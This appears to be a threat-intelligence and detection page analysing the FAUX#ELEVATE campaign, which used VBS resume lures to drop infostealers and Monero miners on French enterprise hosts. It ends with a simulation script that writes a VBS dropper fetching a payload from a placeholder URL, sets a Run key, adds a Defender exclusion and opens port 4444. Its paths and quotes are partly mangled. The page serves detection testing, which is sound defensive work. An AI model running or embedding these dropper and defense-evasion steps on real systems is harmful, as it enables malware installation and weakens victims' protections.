Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto Miners and Infostealers Targeting Enterprise Environments
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A cybercrime operation leverages a malicious VBS resume file to target French-speaking enterprise environments. The dropper is highly obfuscated and is designed to execute only on domain-joined machines, where it delivers credential-stealing malware alongside a Monero miner. The campaign uses trusted services such as Dropbox and compromised Moroccan WordPress sites to host payloads. Stolen data is exfiltrated through SMTP to mail.ru, and the malware removes traces after execution to reduce forensic visibility.
Investigation
Researchers reverse engineered the VBS dropper, uncovered its environment checks, and mapped the full multi-stage infection chain, including 7-Zip extraction, a custom RAT named RuntimeHost.exe, ChromElevator browser credential theft, and XMRig mining activity. They also identified supporting infrastructure such as IP addresses, dynamic DNS entries, and hacked WordPress servers. Persistence was linked to registry Run keys and a concealed scheduled task.
Mitigation
Defenders should block suspicious VBS files and enforce strict controls on email attachments. Monitoring should focus on abnormal execution of wscript.exe, PowerShell commands that add Defender exclusions, and registry changes affecting EnableLUA. Organizations should restrict outbound SMTP from non-mail applications and watch connections to known Dropbox and mining-pool infrastructure. Any identified registry keys or scheduled tasks should be removed or quarantined.
Response
Security teams should detect creation of the “Microsoft Media Service” and “z_MicrosoftEdgeAutoLaunch_2EDFBF” Run keys, along with the hidden “MicrosoftUpdateService” scheduled task. Alerts should fire on wscript.exe processes that reach out to Dropbox or the documented WordPress domains. Malicious files must be quarantined, the host isolated, and exposed browser credentials reset. A forensic review should then determine whether any stolen data was exfiltrated through mail.ru.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Technique</b> – T1566.001 Phishing: Spearphishing Attachment<br/><b>Description</b>: Email with malicious attachment that, when opened, delivers the initial payload."] class step_phishing action step_user_execute["<b>Technique</b> – T1204.002 User Execution: Malicious File<br/><b>Description</b>: Victim runs the attached VBS file, triggering the dropper."] class step_user_execute action step_dropper["<b>Technique</b> – T1059.005 Visual Basic (VBScript)<br/><b>Technique</b> – T1027 Obfuscated Files or Information<br/><b>Description</b>: Obfuscated VBS script acts as a dropper that extracts additional components."] class step_dropper action step_domain_check["<b>Technique</b> – T1069.002 Permission Group Discovery: Domain<br/><b>Description</b>: Checks if the host is joined to a domain to adapt behavior."] class step_domain_check technique step_uac_bypass["<b>Technique</b> – T1548.002 Bypass User Account Control<br/><b>Technique</b> – T1562.001 Impair Defenses: Disable Security Tools<br/><b>Technique</b> – T1564.012 Hide Artifacts: Defender Exclusions<br/><b>Description</b>: Elevates privileges, disables defenses and adds exclusions."] class step_uac_bypass technique step_download["<b>Technique</b> – T1102 Web Service<br/><b>Technique</b> – T1102.001 Dead Drop Resolver<br/><b>Description</b>: Retrieves additional payloads from Dropbox or web locations."] class step_download technique step_deploy_toolkit["<b>Tool</b> – RuntimeHost.exe, XMRig Miner, Browser Stealers<br/><b>Description</b>: Deploys components for mining, credential theft and further exploitation."] class step_deploy_toolkit tool step_cred_access["<b>Technique</b> – T1555.003 Credentials from Web Browsers<br/><b>Description</b>: Extracts stored browser passwords and cookies."] class step_cred_access technique step_collect_files["<b>Technique</b> – T1005 Data from Local System<br/><b>Description</b>: Gathers files from the user's desktop for exfiltration."] class step_collect_files technique step_exfiltration["<b>Technique</b> – T1048.002 Exfiltration Over Encrypted Nonu2011C2 Protocol: SMTP<br/><b>Technique</b> – T1071.003 Web Protocols: Mail Protocols<br/><b>Description</b>: Sends collected data via encrypted SMTP."] class step_exfiltration technique step_resource_hijack["<b>Technique</b> – T1496 Resource Hijacking<br/><b>Description</b>: Uses XMRig to mine cryptocurrency on the victim host."] class step_resource_hijack technique step_process_injection["<b>Technique</b> – T1055 Process Injection<br/><b>Description</b>: Injects malicious code into explorer.exe to hide activity."] class step_process_injection technique step_c2["<b>Technique</b> – T1102 Web Service (HTTPS/Dynamic DNS)<br/><b>Description</b>: Maintains commandu2011andu2011control over encrypted web traffic and custom ports."] class step_c2 technique step_persistence["<b>Technique</b> – T1547.001 Registry Run Keys / Startup Folder<br/><b>Technique</b> – T1053 Scheduled Task/Job (Hidden)<br/><b>Description</b>: Establishes persistence via Run key and a concealed scheduled task."] class step_persistence technique step_cleanup["<b>Technique</b> – T1070.004 File Deletion<br/><b>Description</b>: Removes artifacts and logs to evade detection."] class step_cleanup technique %% Edge connections step_phishing –>|leads_to| step_user_execute step_user_execute –>|leads_to| step_dropper step_dropper –>|leads_to| step_domain_check step_domain_check –>|leads_to| step_uac_bypass step_uac_bypass –>|leads_to| step_download step_download –>|leads_to| step_deploy_toolkit step_deploy_toolkit –>|enables| step_cred_access step_deploy_toolkit –>|enables| step_collect_files step_cred_access –>|combined_with| step_collect_files step_cred_access –>|supports| step_exfiltration step_collect_files –>|supports| step_exfiltration step_deploy_toolkit –>|enables| step_resource_hijack step_deploy_toolkit –>|enables| step_process_injection step_process_injection –>|provides| step_c2 step_c2 –>|used_by| step_exfiltration step_deploy_toolkit –>|establishes| step_persistence step_persistence –>|followed_by| step_cleanup step_exfiltration –>|followed_by| step_cleanup "
Attack Flow
Detections
Possible IP Lookup Domain Communications Attempted (via dns)
View
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
Suspicious Execution from Public User Profile (via process_creation)
View
Possible Defense Evasion by Extracting Encrypted Archive Using 7-Zip (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Defender Exclusions Modification (via cmdline)
View
Windows Defender Preferences Suspicious Changes (via powershell)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Suspicious Scheduled Task (via audit)
View
Short File Name (via cmdline)
View
Possible UAC Bypass – UAC Disable Attempt (via registry_event)
View
Suspicious Files in Public User Profile (via file_event)
View
IOCs (HashSha256) to detect: Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto miners and Infostealers Targeting Enterprise Environments
View
IOCs (SourceIP) to detect: Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto miners and Infostealers Targeting Enterprise Environments
View
IOCs (Emails) to detect: Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto miners and Infostealers Targeting Enterprise Environments
View
IOCs (DestinationIP) to detect: Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto miners and Infostealers Targeting Enterprise Environments
View
FAUX Elevate Credential and Cryptocurrency Mining Detection [Windows Network Connection]
View
SMTP and C2 Domain Communication Detection [Windows Network Connection]
View
Detection of FAUX#ELEVATE Campaign Persistence and Credential Theft [Windows Process Creation]
View
Malicious VBS Dropper and Firewall Modifications Detection [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Stage 1 – Drop malicious VBS: The attacker writes a VBS dropper that downloads a second-stage payload and writes a registry run key for persistence.
- Stage 2 – Execute VBS via
wscript.exewith PowerShell as the parent process, thereby satisfying the detection’s parent‑child condition. - Stage 3 – Within the VBS, invoke PowerShell to add a Microsoft Defender exclusion (T1562.001) and Netsh to open inbound TCP port 4444 (T1562.004) for C2.
- Stage 4 – Clean up evidence after success.
-
Regression Test Script: (PowerShell – self‑contained; run with administrative rights)
# ----------------------------------------------------------------------- # Malicious VBS Dropper Simulation – triggers Sigma rule: # Image == "*wscript.exe" AND ParentImage in ("*\powershell.exe","*\netsh.exe") # ----------------------------------------------------------------------- $vbsPath = "$env:Tempmalicious_dropper.vbs" $payloadUrl = "http://example.com/payload.exe" # placeholder URL $payloadPath = "$env:Temppayload.exe" # 1. Create malicious VBS that: # • Downloads a payload # • Writes a Run key for persistence # • Calls PowerShell to add Defender exclusion # • Calls Netsh to open a firewall rule $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", "$payloadUrl", False objXML.Send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$payloadPath", 2 End If
‘ Persist via Run key Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”
‘ Defender exclusion via PowerShell (executed inline) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True
‘ Open firewall port 4444 via Netsh (executed inline) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Launch the VBS with PowerShell as the parent process
Write-Host "[*] Launching malicious VBS via wscript.exe (parent: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait
# 3. Verify that firewall rule was added (optional)
netsh advfirewall firewall show rule name=MaliciousPort
# 4. Cleanup artifacts (payload & VBS) – left for separate cleanup section
Write-Host "[+] Simulation complete. Review alerts in SIEM."
```
-
Cleanup Commands: (run after verification)
# Remove firewall rule netsh advfirewall firewall delete rule name="MaliciousPort" # Remove Defender exclusion powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'" # Delete persistence Run key reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f # Delete files Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force Remove-Item -Path "$env:Temppayload.exe" -Force Write-Host "[+] Cleanup completed."